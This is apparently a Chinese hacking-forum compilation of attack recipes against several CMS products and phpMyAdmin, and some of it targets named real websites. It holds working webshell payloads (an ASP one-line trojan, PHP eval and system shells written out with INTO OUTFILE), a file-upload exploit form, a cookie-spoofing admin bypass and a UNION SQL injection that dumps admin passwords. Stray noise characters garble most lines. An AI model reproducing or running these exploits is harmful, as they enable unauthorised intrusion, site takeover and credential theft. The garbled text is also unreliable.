h/ _" i2 F" T% h7 a6 W跳转到网站根目录上传任意文件。* u+ U. ~5 L+ R( x; `; F( x7 l
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
; T+ g" U! I, t7 w( D( u$ L<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">9 X% K6 t" g, _" ~6 D2 z5 Z% V! u
Upload a new file:<br>
5 ` F2 \& o, r/ Z. N9 w<input type="file" name="NewFile" size="50"><br>* Q6 d9 ?: N$ O+ _: b1 ~
<input id="btnUpload" type="submit" value="Upload">
3 b, S' m$ i' `. W. c4 Q</form>
9 e- H' I2 F2 {+ s-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ U9 j7 [) ? g) }6 ~
% y4 P1 |9 E0 l) WSDcms 后台拿webshell
2 ^7 ^" M) L+ D# O, e f
" [6 Z4 ]; u, o. b2 q( K第一种方法:8 F+ f& o0 H3 `3 n3 C( E
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
+ F, ?! C* Z( B# `8 j6 p( c把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx# z1 J8 z; A- ]) v S/ N
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
|1 z$ M3 W% L第二种方法:
& J8 `& b8 h- N1 \4 ?' [进入后台-->系统管理-->系统设置-->系统设置->上传设置;- _8 [3 A8 o5 c5 ^4 e
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
- e$ \. J a+ ^% Y' }6 L第三种方法:
) l4 O6 [6 s7 b- p2 \7 m# B进入后台-->界面管理-->模板文件管理-->创建文件& ?% e$ q0 }' |; U
文件名写入getshell.ashx |6 C, l8 ^, ~* a7 B2 `
内容写入下面内容:# a' f, g* h4 }. I
/====================复制下面的=========================/, }' O3 V# G8 ?# L D O
<%@ WebHandler Language="C#" Class="Handler" %>" o" K& ~/ q; V9 R
using System;( a& y, }( n4 a% d$ r% q5 F
using System.Web;
; n( F$ C: X4 \4 fusing System.IO; U1 \: s$ K% b( _2 i& d& ~
public class Handler : IHttpHandler {$ k+ a! W5 P# X$ [, ]/ J$ y
public void ProcessRequest (HttpContext context) {/ ^, |$ w, F0 q- A5 T( y
context.Response.ContentType = "text/plain";
1 i0 s4 r, w9 s; T& v; w2 g4 ~StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));: y5 j) e" M l: y
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
3 w; S+ ^& _7 I8 v. M2 Nfile1.Flush();
: r' h& h+ B/ \file1.Close();1 E6 A. I" J2 U! F4 v& z6 N3 t, q; A I
}
4 K0 {( ]) K6 e v/ T& v+ I8 ^public bool IsReusable {9 C, d/ K+ k# H& y) g& ~
get {
0 X: g% q, L# i; T. B: [return false;8 g3 C5 F' K, F- N! C
}
3 c) @8 D8 v% A3 `- K}
u. Z5 I% s; q7 T+ Z. x& Y1 B}
( z$ f7 M8 q9 ?$ X. A: R/=============================================/
6 O: U3 ?$ ^- }) |访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx0 T s1 Q5 O, a) v. L) [! l2 d+ L m; p
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接6 N+ v g3 V6 z! B9 f3 M; V6 p
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- A* r/ \) H, ~+ ^3 Q' b" k7 a$ B+ J8 t/ f E
ESCMS网站管理系统0day, ~2 W" a: H. j) B# x; C2 T% d
" G: x1 B8 H% r6 U) i( V
后台登陆验证是通过admin/check.asp实现的& |4 Q, x$ H6 [2 v
& V1 D- f' H! o/ f首先我们打开http://target.com/admin/es_index.html1 w0 I- A# o# E+ b0 q$ U6 B
然后在COOKIE结尾加上4 F$ a9 m$ L! g9 Q% I! |
; ESCMS$_SP2=ES_admin=st0p;
, D, }+ a7 q" J2 P5 Q) h8 K修改,然后刷新
/ n) m, l* v5 D5 K进后台了嘎..5 a: m8 b* j2 b5 N$ ~8 h, _- A4 |6 r
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL7 V0 V0 N N) U3 D8 O4 k8 h
4 l5 r, M+ \0 K6 t5 F2 T
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.- B8 i r* N& y5 ~2 O
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp4 M$ T F1 ^+ M7 q
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..8 C ]. x, m# G3 i
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了/ P# n" V) M( x6 S0 O
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------. S1 x8 ]# A- H/ G, e* ^/ H2 m- b& ]
, u# O/ @& n* ~" s- s0 A4 [宁志网站管理系统后台无验证漏洞及修复
/ |9 c7 a# c) U$ [: i
( E1 N; a7 L+ C8 v) c网上搜了一下,好像没有发布.如有雷同纯粹巧合!
$ y; L5 C% i: r; Z: O官方网站:www.ningzhi.net$ v; F# R |& M( v# \& N' X
学校网站管理系统 V.2011版本
' U! B3 A x. A& a; ~" Phttp://down.chinaz.com/soft/29943.htm 0 q, |3 M u6 n) K& x$ }
其它版本(如:政府版等),自行下载.4 A# ~$ H8 w7 ^5 R6 C5 `
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
* O5 p! S: g" h; b- C: A3 o2 x; mlogin.asp代码如下:
5 Q0 I, d# o1 W' b/ \% A<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> . Z. ]* g( v$ x& B5 g
manage.asp代码我就不帖出来了.反正也没验证.0 ]7 S- S+ {9 b) V1 U3 V) e
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
: \1 ]. \1 ~$ `5 F: M漏洞利用:
% Y0 o# ~4 U; {8 A9 Y0 x. \% E直接访问http://www.0855.tv/admin/manage.asp
5 R9 _' C$ O3 m& f- ^6 V数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
/ G/ ?4 r, I1 p% V----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 T+ g* N# C. q( @; ^' H2 f% O8 ]! r9 y
phpmyadmin拿shell的四种方法总结及修复* E% I0 u4 ~1 w7 G
/ O7 _1 O, v. p6 }& l
方法一:
2 H+ p( e, F6 L, b6 ^CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
5 f- a! v7 H! mINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
4 T+ z, v9 F# @" m% v- `% XSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; N: I& N& [" v# V9 s
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
9 {3 j; [! P& Z 一句话连接密码:7on2 p- ^: v! D& h! \
方法二:: D" g* Q0 y' \ b& t
读取文件内容: select load_file('E:/xamp/www/s.php');
) @, P- m7 I# |2 G! K8 M$ e. |写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'9 W% `9 l# l* V* Y, E
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
6 W3 z* t5 }& ]方法三:
+ t- `8 g, X& JJhackJ版本 PHPmyadmin拿shell
3 Z& V5 M) \5 w) UCreate TABLE study (cmd text NOT NULL);7 M4 e7 v0 X/ \5 y
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');6 C( H1 x- u$ f. k/ z
select cmd from study into outfile 'E:/wamp/www/7.php';
`4 n: ]" H* rDrop TABLE IF EXISTS study;$ P) E* b$ n4 B w
<?php eval($_POST[cmd])?>
- } i' t" @: N9 G0 }CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
8 W: x4 U8 V( Q( Y b( ?! hINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
& t% E4 W3 m. G' [' lSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
! C/ b1 p* M4 L' q" o3 A7 Z3 `" pDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
6 ]5 U4 R. M9 {方法四:
1 d; s5 y& l. n! Mselect load_file('E:/xamp/www/study.php');
; }) S. O# ^" C6 Tselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
1 Z/ o' b$ I5 C4 E然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
# P$ n/ G+ F4 c& D-----------------------------------------------------------------------------------------------------------------------------------------------------------------------8 P' ]! d" M' w
+ ^$ b& O/ J: M( i9 C( r9 z& J5 Y4 M; CNO.001中学网站管理系统 Build 110628 注入漏洞# Q6 P4 C. }) Y4 ]# X* @
7 _' m3 J1 ~4 v
NO.001中学网站管理系统功能模块: J( _$ I |: u# M/ N4 Z9 Y
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
! L' T0 q$ K- I) {7 ^# J: ~2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
2 o+ ]1 N# v0 I3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息2 C1 F& ~ U: X1 v
4.视频图片管理:一级分类,动态添加视频或者图片等信息* U6 m: v/ X0 l2 B9 \" R( @
5.留言管理:对留言,修改,删除、回复等管理1 \. c: i9 i' |* Y
6.校友频道:包括校友资料excel导出、管理等功能
9 v0 Y% |7 C: P4 h7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
+ |# p* v R- A2 [默认后台:admin/login.asp
+ M5 f. l) ?" R官方演示:http://demo.001cms.net; {, [# W+ h3 o
源码下载地址:http://down.chinaz.com/soft/30187.htm2 w& a' e0 `/ M
EXP:/ U. ~3 W& d/ P
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin' T* I( Y+ k- f" N
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin1 Y1 Y) Q9 g) S! C
getshell:后台有备份,你懂的
# T3 a8 G; T7 ?0 b! Y/ o0 t) s另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。# Q; R8 M+ Z, B+ k Q+ E
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |